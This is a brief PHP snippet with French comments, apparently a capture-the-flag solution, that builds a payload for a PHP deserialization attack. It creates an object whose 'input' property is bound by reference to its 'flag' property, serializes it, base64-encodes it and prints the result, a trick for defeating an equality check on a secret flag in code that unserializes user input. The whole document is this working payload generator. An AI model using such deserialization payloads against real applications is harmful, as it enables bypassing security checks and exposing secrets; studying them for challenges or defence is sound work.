<?php class Ref { public $input; public $flag; } $obj = new Ref(); // On lie input et flag par référence $obj->input = &$obj->flag; // Sérialisation et encodage $payload = base64_encode(serialize($obj)); echo $payload; ?>
You have javascript disabled. You will not be able to edit any code.